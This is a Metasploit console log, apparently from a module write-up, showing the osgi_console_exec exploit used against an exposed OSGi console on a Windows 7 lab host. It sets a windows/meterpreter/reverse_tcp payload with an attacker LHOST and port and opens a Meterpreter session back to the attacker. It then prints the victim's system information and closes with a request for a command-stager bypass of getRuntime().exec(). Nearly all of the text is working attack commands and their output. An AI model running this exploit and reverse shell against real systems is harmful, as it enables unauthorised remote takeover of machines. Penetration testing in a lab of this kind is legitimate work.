msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1
msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.3:5555 - Accessing the OSGi console ...
[*] 172.20.10.3:5555 - Exploiting...
[*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session...
[*] Sending stage (179779 bytes) to 172.20.10.3
[*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100
msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : PENTEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```


If you happen to know a good bypass to feed command stager to `getRuntime().exec()` without relying on the presence of bash let me know :)
